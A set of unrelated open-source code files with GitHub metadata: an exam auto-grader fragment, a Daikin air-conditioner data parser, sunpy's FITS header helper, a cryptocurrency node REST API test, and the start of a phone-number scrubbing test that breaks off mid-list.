            test_cases = json.loads(test_config.read())
        for test_case in test_cases:
            # Reference output: the unmodified instructor solution.
            expected = run_user_solution(
                {}, test_case['run'], exam_config, test_case['input'])
            # Substitute only the answers relevant to this test case.
            user_inputs = {key: value
                           for key, value in user_solutions.items()
                           if key in test_case['questions']}
            actual = run_user_solution(user_inputs,
                                       test_case['run'],
                                       exam_config,
                                       test_case['input'])
            if actual == expected:
                message = "Test case passed: +{} Points".format(test_case[
                    'points'])
                score = test_case['points']
            else:
                message = \
                    "Expected:\n {}".format(expected) + \
                    "\n\nActual:\n{}".format(actual)
                score = 0
            for quest_name in test_case['questions']:
                if quest_name not in quest_dict:
                    quest_dict[quest_name] = \
                        {'real_test_score': score,
                         'max_test_score': test_case['points'],
                         'name': quest_name,
                         'real_question_score':
                             50 if score == test_case['points'] else 0,
                         'max_question_score': 50,
                         'message': message
                         }
                else:
                    # accumulate; any failed case zeroes the question score
                    past_data = quest_dict[quest_name]
                    past_data['real_test_score'] += score
                    past_data['max_test_score'] += test_case['points']
                    if score != test_case['points']:
                        past_data['real_question_score'] = 0
                    past_data['message'] += ('\n\n' + message)
                    quest_dict[quest_name] = past_data
    return quest_dict
| {
"content_hash": "3868382dd3273bc568ba18958e85a6aa",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 78,
"avg_line_length": 42.1958762886598,
"alnum_prop": 0.46713901783532863,
"repo_name": "RaphaelArkadyMeyer/LiveCoding",
"id": "1912c3966a89067d2d7e1191b4c648c9aa47aeaa",
"size": "4093",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Server Side/frankencompiler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "251"
},
{
"name": "C",
"bytes": "128"
},
{
"name": "C++",
"bytes": "1785"
},
{
"name": "Python",
"bytes": "23096"
}
],
"symlink_target": ""
} |
import logging
import urllib
log = logging.getLogger(__name__)
def parse_basic_info(x):
    """Decode the basic-info response dict *x* in place and return it;
    the URL-encoded device name is unquoted."""
    parse_data(x,
               integers=['port', 'err', 'pv'],
               booleans=['pow', 'led'])
    x['name'] = urllib.parse.unquote(x['name'])
    return x
def parse_sensor_info(x):
    """Decode the sensor-info response dict *x* in place and return it."""
    parse_data(x,
               integers=['err'],
               temps=['hhum', 'htemp', 'otemp'])
    return x
# Field groups shared by parse_control_info/format_control_info below.
ctrl_integers = ['alert', 'mode', 'b_mode']
ctrl_temps = ['shum', 'stemp', 'b_shum']
ctrl_booleans = ['pow']
def parse_control_info(x):
    # Decode the control-info response dict in place and return it.
    parse_data(x, integers=ctrl_integers, temps=ctrl_temps, booleans=ctrl_booleans)
    return x
def format_control_info(x):
    # Inverse of parse_control_info: stringify the same fields in place.
    format_data(x, integers=ctrl_integers, temps=ctrl_temps, booleans=ctrl_booleans)
    return x
def parse_data(x, integers=[],
               booleans=[],
               temps=[]):
    """Coerce string values of *x* in place: listed fields become int, bool
    (via int), or float/None temperatures respectively.

    Parse failures are logged (with traceback) and the field is left as-is.

    Fix vs. original: Python 3 exceptions have no ``.message`` attribute, so
    the old ``e.message`` made the error handlers themselves raise
    AttributeError; the exception object is formatted directly instead.
    """
    for field in integers:
        try:
            x[field] = int(x[field])
        except ValueError as e:
            log.exception("failed to parse field '{}': {}".format(field, e))
    for field in booleans:
        try:
            x[field] = bool(int(x[field]))
        except ValueError as e:
            log.exception("Failed to parse field '{}': {}".format(field, e))
    for field in temps:
        try:
            x[field] = parse_temperature(x[field])
        except ValueError:
            log.exception(("Failed to parse field {{'{}':'{}'}}."
                           "A temperature was expected").format(field, x[field]))
def format_data(x, strict=True,
                integers=[],
                booleans=[],
                temps=[]):
    # Inverse of parse_data: stringify the listed fields of *x* in place.
    # NOTE(review): `strict` currently has no effect — every KeyError branch
    # falls through whether strict is True or False (there is no re-raise).
    # Presumably strict=True was meant to propagate the KeyError; confirm
    # before relying on it.
    for field in integers:
        try:
            x[field] = str(int(x[field]))
        except KeyError:
            if not strict:
                pass
    for field in booleans:
        try:
            x[field] = str(int(bool(x[field])))
        except KeyError:
            if not strict:
                pass
    for field in temps:
        try:
            x[field] = str(float(x[field]))
        except KeyError:
            if not strict:
                pass
def parse_temperature(temp):
    """Return *temp* as a float; the device placeholders '-' and '--' mean
    "no reading" and yield None. Anything else unparseable raises ValueError."""
    if temp in ('-', '--'):
        return None
    return float(temp)
| {
"content_hash": "9d77d0eb0e843bbd6b2bbe4d1767a9ce",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 84,
"avg_line_length": 24.926315789473684,
"alnum_prop": 0.5219594594594594,
"repo_name": "ael-code/daikin-aricon-pylib",
"id": "be99f598482d86d7a7f672e386d254c0ba4076d3",
"size": "2368",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bridge.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "9071"
}
],
"symlink_target": ""
} |
import warnings
import numpy as np
import astropy.units as u
import astropy.wcs
from astropy.coordinates import SkyCoord
from sunpy.coordinates import frames
from sunpy.util import MetaDict
from sunpy.util.exceptions import SunpyUserWarning
__all__ = ['meta_keywords', 'make_fitswcs_header']
def meta_keywords():
    """
    Returns the metadata keywords that are used when creating a `sunpy.map.GenericMap`.
    Examples
    --------
    Returns a dictionary of all meta keywords that are used in a `sunpy.map.GenericMap` header:
    >>> import sunpy.map
    >>> sunpy.map.meta_keywords()
    {'cunit1': 'Units of the coordinate increments along naxis1 e.g. arcsec **required',
     'cunit2': 'Units of the coordinate increments along naxis2 e.g. arcsec **required',
     ...
    """
    # NOTE: returns the shared module-level dict itself, not a copy.
    return _map_meta_keywords
@u.quantity_input(equivalencies=u.spectral())
def make_fitswcs_header(data, coordinate, reference_pixel: u.pix = None,
                        scale: u.arcsec/u.pix = None,
                        rotation_angle: u.deg = None,
                        rotation_matrix=None, instrument=None,
                        telescope=None, observatory=None,
                        wavelength: u.angstrom=None, exposure: u.s=None):
    """
    Function to create a FITS-WCS header from a coordinate object
    (`~astropy.coordinates.SkyCoord`) that is required to
    create a `~sunpy.map.GenericMap`.

    Parameters
    ----------
    data : `~numpy.ndarray`
        Array data of Map for which a header is required.
    coordinates : `~astropy.coordinates.SkyCoord` or `~astropy.coordinates.BaseFrame`
        Coordinate object to get meta information for map header.
    reference_pixel :`~astropy.units.Quantity` of size 2, optional
        Reference pixel along each axis. These are expected to be Cartestian ordered, i.e
        the first index is the x axis, second index is the y axis. Defaults to
        the center of data array, ``(data.shape[1] - 1)/2., (data.shape[0] - 1)/2.)``,
        this argument is zero indexed (Python convention) not 1 indexed (FITS
        convention).
    scale : `~astropy.units.Quantity` of size 2, optional
        Pixel scaling along x and y axis (i.e. the spatial scale of the pixels (dx, dy)). These are
        expected to be Cartestian ordered, i.e [dx, dy].
        Defaults to ``([1., 1.] arcsec/pixel)``.
    rotation_angle : `~astropy.unit.Quantity`, optional
        Coordinate system rotation angle, will be converted to a rotation
        matrix and stored in the ``PCi_j`` matrix. Can not be specified with
        ``rotation_matrix``.
    rotation_matrix : `~numpy.ndarray` of dimensions 2x2, optional
        Matrix describing the rotation required to align solar North with
        the top of the image in FITS ``PCi_j`` convention. Can not be specified
        with ``rotation_angle``.
    instrument : `~str`, optional
        Name of the instrument of the observation.
    telescope : `~str`, optional
        Name of the telescope of the observation.
    observatory : `~str`, optional
        Name of the observatory of the observation.
    wavelength : `~u.Quantity`, optional
        Wavelength of the observation as an astropy quanitity, e.g. 171*u.angstrom.
        From this keyword, the meta keywords ``wavelnth`` and ``waveunit`` will be populated.
    exposure : `~u.Quantity`, optional
        Exposure time of the observation

    Returns
    -------
    `~sunpy.util.MetaDict`
        The header information required for making a `sunpy.map.GenericMap`.

    Examples
    --------
    >>> import sunpy.map
    >>> from sunpy.coordinates import frames
    >>> from astropy.coordinates import SkyCoord
    >>> import astropy.units as u
    >>> import numpy as np
    >>> data = np.random.rand(1024, 1024)
    >>> my_coord = SkyCoord(0*u.arcsec, 0*u.arcsec, obstime="2017-08-01",
    ...                     observer = 'earth', frame=frames.Helioprojective)
    >>> my_header = sunpy.map.make_fitswcs_header(data, my_coord)
    >>> my_map = sunpy.map.Map(data, my_header)
    """
    if not isinstance(coordinate, (SkyCoord, frames.BaseCoordinateFrame)):
        raise ValueError("coordinate needs to be a coordinate frame or an SkyCoord instance.")
    if isinstance(coordinate, SkyCoord):
        coordinate = coordinate.frame
    if coordinate.obstime is None:
        raise ValueError("The coordinate needs an observation time, `obstime`.")
    if isinstance(coordinate, frames.Heliocentric):
        raise ValueError("This function does not currently support heliocentric coordinates.")
    meta_wcs = _get_wcs_meta(coordinate)
    if hasattr(coordinate, "observer") and isinstance(coordinate.observer, frames.BaseCoordinateFrame):
        meta_observer = _get_observer_meta(coordinate)
        meta_wcs.update(meta_observer)
    meta_instrument = _get_instrument_meta(instrument, telescope, observatory, wavelength, exposure)
    meta_wcs.update(meta_instrument)
    if reference_pixel is None:
        # Bug fix: default to the zero-indexed array center (shape - 1)/2 as
        # the docstring states; the old (shape + 1)/2 landed one pixel
        # off-center once the FITS +1 offset below was applied.
        reference_pixel = u.Quantity([(data.shape[1] - 1)/2.*u.pixel,
                                      (data.shape[0] - 1)/2.*u.pixel])
    if scale is None:
        scale = [1., 1.] * (u.arcsec/u.pixel)
    # Bug fix: axis 1 is longitude (e.g. HPLN-TAN) and axis 2 is latitude
    # (e.g. HPLT-TAN); the original assignment had lat/lon swapped.
    meta_wcs['crval1'], meta_wcs['crval2'] = (coordinate.spherical.lon.to_value(meta_wcs['cunit1']),
                                              coordinate.spherical.lat.to_value(meta_wcs['cunit2']))
    # Convert the zero-based reference pixel to the 1-based FITS convention.
    meta_wcs['crpix1'], meta_wcs['crpix2'] = (reference_pixel[0].to_value(u.pixel) + 1,
                                              reference_pixel[1].to_value(u.pixel) + 1)
    meta_wcs['cdelt1'], meta_wcs['cdelt2'] = (scale[0].to_value(meta_wcs['cunit1']/u.pixel),
                                              scale[1].to_value(meta_wcs['cunit2']/u.pixel))
    if rotation_angle is not None and rotation_matrix is not None:
        raise ValueError("Can not specify both rotation angle and rotation matrix.")
    if rotation_angle is not None:
        # Build a PCi_j matrix from the angle, accounting for unequal scales.
        lam = meta_wcs['cdelt1'] / meta_wcs['cdelt2']
        p = np.deg2rad(rotation_angle)
        rotation_matrix = np.array([[np.cos(p), -1 * lam * np.sin(p)],
                                    [1/lam * np.sin(p), np.cos(p)]])
    if rotation_matrix is not None:
        (meta_wcs['PC1_1'], meta_wcs['PC1_2'],
         meta_wcs['PC2_1'], meta_wcs['PC2_2']) = (rotation_matrix[0, 0], rotation_matrix[0, 1],
                                                  rotation_matrix[1, 0], rotation_matrix[1, 1])
    meta_dict = MetaDict(meta_wcs)
    return meta_dict
def _get_wcs_meta(coordinate):
    """
    Build the WCS part of the header (ctype/cunit/date-obs keywords) for
    *coordinate* via `astropy.wcs.utils.celestial_frame_to_wcs`.

    Parameters
    ----------
    coordinate : ~`astropy.coordinates.BaseFrame`

    Returns
    -------
    `dict`
        WCS meta information: ctype1/2, cunit1/2, date_obs.
    """
    frame_wcs = astropy.wcs.utils.celestial_frame_to_wcs(coordinate)
    header = dict(frame_wcs.to_header())
    unit_x, unit_y = frame_wcs.wcs.cunit
    header['cunit1'] = unit_x.to_string("fits")
    header['cunit2'] = unit_y.to_string("fits")
    return header
def _get_observer_meta(coordinate):
    """
    Build the observer-location part of the header from *coordinate*.

    Parameters
    ----------
    coordinate : ~`astropy.coordinates.BaseFrame`

    Returns
    -------
    `dict`
        Observer meta information: hgln_obs, hglt_obs, dsun_obs,
        rsun_ref, rsun_obs.
    """
    observer = coordinate.observer
    return {
        'hgln_obs': observer.lon.to_value(u.deg),
        'hglt_obs': observer.lat.to_value(u.deg),
        'dsun_obs': observer.radius.to_value(u.m),
        'rsun_ref': coordinate.rsun.to_value(u.m),
        'rsun_obs': np.arctan(coordinate.rsun / observer.radius).to_value(u.arcsec),
    }
def _get_instrument_meta(instrument, telescope, observatory, wavelength, exposure):
"""
Function to correctly name keywords from keyword arguments
"""
coord = {}
if instrument is not None:
coord['instrume'] = str(instrument)
if telescope is not None:
coord['telescop'] = str(telescope)
if observatory is not None:
coord['obsrvtry'] = str(observatory)
if wavelength is not None:
coord['wavelnth'] = wavelength.to_value()
coord['waveunit'] = wavelength.unit.to_string("fits")
if exposure is not None:
coord['exptime'] = exposure.to_value(u.s)
return coord
# Human-readable descriptions of every header keyword recognised when
# building a GenericMap; exposed to users through meta_keywords().
_map_meta_keywords = {
    'cunit1':
    'Units of the coordinate increments along naxis1 e.g. arcsec **required',
    'cunit2':
    'Units of the coordinate increments along naxis2 e.g. arcsec **required',
    'crval1':
    'Coordinate value at reference point on naxis1 **required',
    'crval2':
    'Coordinate value at reference point on naxis2 **required',
    'cdelt1':
    'Spatial scale of pixels for naxis1, i.e. coordinate increment at reference point',
    'cdelt2':
    'Spatial scale of pixels for naxis2, i.e. coordinate increment at reference point',
    'crpix1':
    'Pixel coordinate at reference point naxis1',
    'crpix2':
    'Pixel coordinate at reference point naxis2',
    'ctype1':
    'Coordinate type projection along naxis1 of data e.g. HPLT-TAN',
    'ctype2':
    'Coordinate type projection along naxis2 of data e.g. HPLN-TAN',
    'hgln_obs':
    'Heliographic longitude of observation',
    'hglt_obs':
    'Heliographic latitude of observation',
    'dsun_obs':
    'distance to Sun from observation in metres',
    'rsun_obs':
    'radius of Sun in meters from observation',
    'date-obs':
    'date of observation e.g. 2013-10-28 00:00',
    'date_obs':
    'date of observation e.g. 2013-10-28 00:00',
    'rsun_ref':
    'reference radius of Sun in meters',
    'solar_r':
    'radius of Sun in meters from observation',
    'radius':
    'radius of Sun in meters from observation',
    'crln_obs':
    'Carrington longitude of observation',
    'crlt_obs':
    'Heliographic latitude of observation',
    'solar_b0':
    'Solar B0 angle',
    'detector':
    'name of detector e.g. AIA',
    'exptime':
    'exposure time of observation, in seconds e.g 2',
    'instrume':
    'name of instrument',
    'wavelnth':
    'wavelength of observation',
    'waveunit':
    'unit for which observation is taken e.g. angstom',
    'obsrvtry':
    'name of observatory of observation',
    'telescop':
    'name of telescope of observation',
    'lvl_num':
    'FITS processing level',
    'crota2':
    'Rotation of the horizontal and vertical axes in degrees',
    'PC1_1':
    'Matrix element PCi_j describing the rotation required to align solar North with the top of the image.',
    'PC1_2':
    'Matrix element PCi_j describing the rotation required to align solar North with the top of the image.',
    'PC2_1':
    'Matrix element PCi_j describing the rotation required to align solar North with the top of the image.',
    'PC2_2':
    'Matrix element PCi_j describing the rotation required to align solar North with the top of the image.',
    'CD1_1':
    'Matrix element CDi_j describing the rotation required to align solar North with the top of the image.',
    'CD1_2':
    'Matrix element CDi_j describing the rotation required to align solar North with the top of the image.',
    'CD2_1':
    'Matrix element CDi_j describing the rotation required to align solar North with the top of the image.',
    'CD2_2':
    'Matrix element CDi_j describing the rotation required to align solar North with the top of the image.'
}
| {
"content_hash": "a9973774acd52e682b106ec28ee23cab",
"timestamp": "",
"source": "github",
"line_count": 312,
"max_line_length": 108,
"avg_line_length": 37.506410256410255,
"alnum_prop": 0.639890616988549,
"repo_name": "dpshelio/sunpy",
"id": "12ccc46579cbd8cfb9c4deef050860272a5ed78d",
"size": "11702",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sunpy/map/header_helper.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "73732"
},
{
"name": "IDL",
"bytes": "5746"
},
{
"name": "Python",
"bytes": "1922243"
},
{
"name": "Shell",
"bytes": "235"
}
],
"symlink_target": ""
} |
from test_framework.test_framework import PhtevencoinTestFramework
from test_framework.util import *
from struct import *
import binascii
import json
import StringIO
import decimal
try:
import http.client as httplib
except ImportError:
import httplib
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
def deser_uint256(f):
    """Read 32 bytes from file-like *f* and return them as a little-endian
    256-bit unsigned integer (eight 32-bit little-endian words)."""
    value = 0
    for word_index in range(8):
        word = unpack(b"<I", f.read(4))[0]
        value |= word << (32 * word_index)
    return value
#allows simple http get calls
def http_get_call(host, port, path, response_object = 0):
    """Issue a plain HTTP GET to host:port/path; return the response object
    when *response_object* is truthy, otherwise the response body."""
    conn = httplib.HTTPConnection(host, port)
    conn.request('GET', path)
    response = conn.getresponse()
    if response_object:
        return response
    return response.read()
#allows simple http post calls with a request body
def http_post_call(host, port, path, requestdata = '', response_object = 0):
    """Issue a plain HTTP POST with *requestdata* as the body; return the
    response object when *response_object* is truthy, otherwise the body."""
    conn = httplib.HTTPConnection(host, port)
    conn.request('POST', path, requestdata)
    response = conn.getresponse()
    if response_object:
        return response
    return response.read()
class RESTTest (PhtevencoinTestFramework):
FORMAT_SEPARATOR = "."
    def setup_chain(self):
        # Start each test from a clean regtest chain for 3 nodes.
        print("Initializing test directory "+self.options.tmpdir)
        initialize_chain_clean(self.options.tmpdir, 3)
def setup_network(self, split=False):
self.nodes = start_nodes(3, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.is_network_split=False
self.sync_all()
def run_test(self):
url = urlparse.urlparse(self.nodes[0].url)
print "Mining blocks..."
self.nodes[0].generate(1)
self.sync_all()
self.nodes[2].generate(100)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 50)
txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
self.sync_all()
self.nodes[2].generate(1)
self.sync_all()
bb_hash = self.nodes[0].getbestblockhash()
assert_equal(self.nodes[1].getbalance(), Decimal("0.1")) #balance now should be 0.1 on node 1
# load the latest 0.1 tx over the REST API
json_string = http_get_call(url.hostname, url.port, '/rest/tx/'+txid+self.FORMAT_SEPARATOR+"json")
json_obj = json.loads(json_string)
vintx = json_obj['vin'][0]['txid'] # get the vin to later check for utxo (should be spent by then)
# get n of 0.1 outpoint
n = 0
for vout in json_obj['vout']:
if vout['value'] == 0.1:
n = vout['n']
######################################
# GETUTXOS: query a unspent outpoint #
######################################
json_request = '/checkmempool/'+txid+'-'+str(n)
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
#check chainTip response
assert_equal(json_obj['chaintipHash'], bb_hash)
#make sure there is one utxo
assert_equal(len(json_obj['utxos']), 1)
assert_equal(json_obj['utxos'][0]['value'], 0.1)
################################################
# GETUTXOS: now query a already spent outpoint #
################################################
json_request = '/checkmempool/'+vintx+'-0'
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
#check chainTip response
assert_equal(json_obj['chaintipHash'], bb_hash)
#make sure there is no utox in the response because this oupoint has been spent
assert_equal(len(json_obj['utxos']), 0)
#check bitmap
assert_equal(json_obj['bitmap'], "0")
##################################################
# GETUTXOS: now check both with the same request #
##################################################
json_request = '/checkmempool/'+txid+'-'+str(n)+'/'+vintx+'-0'
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
assert_equal(len(json_obj['utxos']), 1)
assert_equal(json_obj['bitmap'], "10")
#test binary response
bb_hash = self.nodes[0].getbestblockhash()
binaryRequest = b'\x01\x02'
binaryRequest += binascii.unhexlify(txid)
binaryRequest += pack("i", n);
binaryRequest += binascii.unhexlify(vintx);
binaryRequest += pack("i", 0);
bin_response = http_post_call(url.hostname, url.port, '/rest/getutxos'+self.FORMAT_SEPARATOR+'bin', binaryRequest)
output = StringIO.StringIO()
output.write(bin_response)
output.seek(0)
chainHeight = unpack("i", output.read(4))[0]
hashFromBinResponse = hex(deser_uint256(output))[2:].zfill(65).rstrip("L")
assert_equal(bb_hash, hashFromBinResponse) #check if getutxo's chaintip during calculation was fine
assert_equal(chainHeight, 102) #chain height must be 102
############################
# GETUTXOS: mempool checks #
############################
# do a tx and don't sync
txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
json_string = http_get_call(url.hostname, url.port, '/rest/tx/'+txid+self.FORMAT_SEPARATOR+"json")
json_obj = json.loads(json_string)
vintx = json_obj['vin'][0]['txid'] # get the vin to later check for utxo (should be spent by then)
# get n of 0.1 outpoint
n = 0
for vout in json_obj['vout']:
if vout['value'] == 0.1:
n = vout['n']
json_request = '/'+txid+'-'+str(n)
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
assert_equal(len(json_obj['utxos']), 0) #there should be a outpoint because it has just added to the mempool
json_request = '/checkmempool/'+txid+'-'+str(n)
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
assert_equal(len(json_obj['utxos']), 1) #there should be a outpoint because it has just added to the mempool
#do some invalid requests
json_request = '{"checkmempool'
response = http_post_call(url.hostname, url.port, '/rest/getutxos'+self.FORMAT_SEPARATOR+'json', json_request, True)
assert_equal(response.status, 500) #must be a 500 because we send a invalid json request
json_request = '{"checkmempool'
response = http_post_call(url.hostname, url.port, '/rest/getutxos'+self.FORMAT_SEPARATOR+'bin', json_request, True)
assert_equal(response.status, 500) #must be a 500 because we send a invalid bin request
response = http_post_call(url.hostname, url.port, '/rest/getutxos/checkmempool'+self.FORMAT_SEPARATOR+'bin', '', True)
assert_equal(response.status, 500) #must be a 500 because we send a invalid bin request
#test limits
json_request = '/checkmempool/'
for x in range(0, 20):
json_request += txid+'-'+str(n)+'/'
json_request = json_request.rstrip("/")
response = http_post_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json', '', True)
assert_equal(response.status, 500) #must be a 500 because we exceeding the limits
json_request = '/checkmempool/'
for x in range(0, 15):
json_request += txid+'-'+str(n)+'/'
json_request = json_request.rstrip("/");
response = http_post_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json', '', True)
assert_equal(response.status, 200) #must be a 500 because we exceeding the limits
self.nodes[0].generate(1) #generate block to not affect upcoming tests
self.sync_all()
################
# /rest/block/ #
################
# check binary format
response = http_get_call(url.hostname, url.port, '/rest/block/'+bb_hash+self.FORMAT_SEPARATOR+"bin", True)
assert_equal(response.status, 200)
assert_greater_than(int(response.getheader('content-length')), 80)
response_str = response.read()
# compare with block header
response_header = http_get_call(url.hostname, url.port, '/rest/headers/1/'+bb_hash+self.FORMAT_SEPARATOR+"bin", True)
assert_equal(response_header.status, 200)
assert_equal(int(response_header.getheader('content-length')), 80)
response_header_str = response_header.read()
assert_equal(response_str[0:80], response_header_str)
# check block hex format
response_hex = http_get_call(url.hostname, url.port, '/rest/block/'+bb_hash+self.FORMAT_SEPARATOR+"hex", True)
assert_equal(response_hex.status, 200)
assert_greater_than(int(response_hex.getheader('content-length')), 160)
response_hex_str = response_hex.read()
assert_equal(response_str.encode("hex")[0:160], response_hex_str[0:160])
# compare with hex block header
response_header_hex = http_get_call(url.hostname, url.port, '/rest/headers/1/'+bb_hash+self.FORMAT_SEPARATOR+"hex", True)
assert_equal(response_header_hex.status, 200)
assert_greater_than(int(response_header_hex.getheader('content-length')), 160)
response_header_hex_str = response_header_hex.read()
assert_equal(response_hex_str[0:160], response_header_hex_str[0:160])
assert_equal(response_header_str.encode("hex")[0:160], response_header_hex_str[0:160])
# check json format
block_json_string = http_get_call(url.hostname, url.port, '/rest/block/'+bb_hash+self.FORMAT_SEPARATOR+'json')
block_json_obj = json.loads(block_json_string)
assert_equal(block_json_obj['hash'], bb_hash)
# compare with json block header
response_header_json = http_get_call(url.hostname, url.port, '/rest/headers/1/'+bb_hash+self.FORMAT_SEPARATOR+"json", True)
assert_equal(response_header_json.status, 200)
response_header_json_str = response_header_json.read()
json_obj = json.loads(response_header_json_str, parse_float=decimal.Decimal)
assert_equal(len(json_obj), 1) #ensure that there is one header in the json response
assert_equal(json_obj[0]['hash'], bb_hash) #request/response hash should be the same
#compare with normal RPC block response
rpc_block_json = self.nodes[0].getblock(bb_hash)
assert_equal(json_obj[0]['hash'], rpc_block_json['hash'])
assert_equal(json_obj[0]['confirmations'], rpc_block_json['confirmations'])
assert_equal(json_obj[0]['height'], rpc_block_json['height'])
assert_equal(json_obj[0]['version'], rpc_block_json['version'])
assert_equal(json_obj[0]['merkleroot'], rpc_block_json['merkleroot'])
assert_equal(json_obj[0]['time'], rpc_block_json['time'])
assert_equal(json_obj[0]['nonce'], rpc_block_json['nonce'])
assert_equal(json_obj[0]['bits'], rpc_block_json['bits'])
assert_equal(json_obj[0]['difficulty'], rpc_block_json['difficulty'])
assert_equal(json_obj[0]['chainwork'], rpc_block_json['chainwork'])
assert_equal(json_obj[0]['previousblockhash'], rpc_block_json['previousblockhash'])
#see if we can get 5 headers in one response
self.nodes[1].generate(5)
self.sync_all()
response_header_json = http_get_call(url.hostname, url.port, '/rest/headers/5/'+bb_hash+self.FORMAT_SEPARATOR+"json", True)
assert_equal(response_header_json.status, 200)
response_header_json_str = response_header_json.read()
json_obj = json.loads(response_header_json_str)
assert_equal(len(json_obj), 5) #now we should have 5 header objects
# do tx test
tx_hash = block_json_obj['tx'][0]['txid'];
json_string = http_get_call(url.hostname, url.port, '/rest/tx/'+tx_hash+self.FORMAT_SEPARATOR+"json")
json_obj = json.loads(json_string)
assert_equal(json_obj['txid'], tx_hash)
# check hex format response
hex_string = http_get_call(url.hostname, url.port, '/rest/tx/'+tx_hash+self.FORMAT_SEPARATOR+"hex", True)
assert_equal(hex_string.status, 200)
assert_greater_than(int(response.getheader('content-length')), 10)
# check block tx details
# let's make 3 tx and mine them on node 1
txs = []
txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11))
txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11))
txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11))
self.sync_all()
# check that there are exactly 3 transactions in the TX memory pool before generating the block
json_string = http_get_call(url.hostname, url.port, '/rest/mempool/info'+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
assert_equal(json_obj['size'], 3)
# the size of the memory pool should be greater than 3x ~100 bytes
assert_greater_than(json_obj['bytes'], 300)
# check that there are our submitted transactions in the TX memory pool
json_string = http_get_call(url.hostname, url.port, '/rest/mempool/contents'+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
for tx in txs:
assert_equal(tx in json_obj, True)
# now mine the transactions
newblockhash = self.nodes[1].generate(1)
self.sync_all()
#check if the 3 tx show up in the new block
json_string = http_get_call(url.hostname, url.port, '/rest/block/'+newblockhash[0]+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
for tx in json_obj['tx']:
if not 'coinbase' in tx['vin'][0]: #exclude coinbase
assert_equal(tx['txid'] in txs, True)
#check the same but without tx details
json_string = http_get_call(url.hostname, url.port, '/rest/block/notxdetails/'+newblockhash[0]+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
for tx in txs:
assert_equal(tx in json_obj['tx'], True)
#test rest bestblock
bb_hash = self.nodes[0].getbestblockhash()
json_string = http_get_call(url.hostname, url.port, '/rest/chaininfo.json')
json_obj = json.loads(json_string)
assert_equal(json_obj['bestblockhash'], bb_hash)
# Script entry point: run the REST functional test.
if __name__ == '__main__':
    RESTTest().main()
| {
"content_hash": "e18df274410c14f30307ddd9f4636013",
"timestamp": "",
"source": "github",
"line_count": 333,
"max_line_length": 132,
"avg_line_length": 45.171171171171174,
"alnum_prop": 0.6149448211673979,
"repo_name": "ravenbyron/phtevencoin",
"id": "5e28cc625c39777e7e69ab50108adb48f5e4c70c",
"size": "15284",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/rest.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "541198"
},
{
"name": "C++",
"bytes": "3851465"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "Groff",
"bytes": "18737"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2104"
},
{
"name": "Makefile",
"bytes": "69869"
},
{
"name": "Objective-C",
"bytes": "2034"
},
{
"name": "Objective-C++",
"bytes": "7256"
},
{
"name": "Protocol Buffer",
"bytes": "2324"
},
{
"name": "Python",
"bytes": "479309"
},
{
"name": "QMake",
"bytes": "2024"
},
{
"name": "Shell",
"bytes": "33962"
}
],
"symlink_target": ""
} |
import unittest
from base import BaseTestCase
class PhoneNumberTestCase(unittest.TestCase, BaseTestCase):
    """Checks that phone numbers in assorted formats are scrubbed to {{PHONE}}."""
    def create_docstring(self, phone_number):
        """Build a BEFORE/AFTER fixture embedding *phone_number*."""
        template = """
            BEFORE: My phone number is %s
            AFTER: My phone number is {{PHONE}}
        """
        return template % phone_number
    def check_phone_numbers(self, *phone_numbers):
        """Run the before/after comparison for every supplied number."""
        for number in phone_numbers:
            fixture = self.create_docstring(number)
            self.compare_before_after(docstring=fixture)
    def test_american_phone_number(self):
        """test american-style phone numbers"""
        american_formats = (
            '1-312-515-2239',
            '+1-312-515-2239',
            '1 (312) 515-2239',
            '312-515-2239',
            '(312) 515-2239',
            '(312)515-2239',
        )
        self.check_phone_numbers(*american_formats)
    def test_extension_phone_numbers(self):
        """test phone numbers with extensions"""
        extension_formats = (
            '312-515-2239 x12',
            '312-515-2239 ext. 12',
            '312-515-2239 ext.12',
        )
        self.check_phone_numbers(*extension_formats)
    def test_international_phone_numbers(self):
        """test international phone numbers"""
        international_formats = (
            '+47 21 30 85 99',
            '+45 69 19 88 56',
            '+46 852 503 499',
            '+31 619 837 236',
